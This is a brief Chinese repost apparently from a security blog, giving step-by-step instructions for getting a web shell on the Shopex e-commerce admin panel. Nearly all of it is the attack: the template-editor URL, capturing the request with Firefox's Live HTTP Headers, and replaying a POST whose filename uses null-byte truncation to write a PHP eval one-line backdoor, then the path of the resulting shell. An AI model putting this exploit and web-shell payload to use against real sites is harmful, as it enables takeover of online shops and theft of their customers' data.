Shopex 后台getshell

来源:互联网 发布:亿赛通数据泄露防护 编辑:程序博客网 时间:2024/04/29 09:58

应为SHOPEX把GPC转义回来了
在模板编辑那里 可以直接截断文件名,
代码就不贴了。利用方法

打开

./shopadmin/index.php#ctl=system/template&act=editor&p[0]=black&p[1]=index.html

随便点一个编辑

利用火狐插件

LIVE HTTP HEADER 抓包

点击replay

将post的内容改为

theme=purple&file=index(2).php%00.html&type=index(2)&file_name=&isbak=1&__=1&content=<?php eval($_POST[c])?>

点击repaly提交

然后./themes/purple/index(2).php 便是shell

原创粉丝点击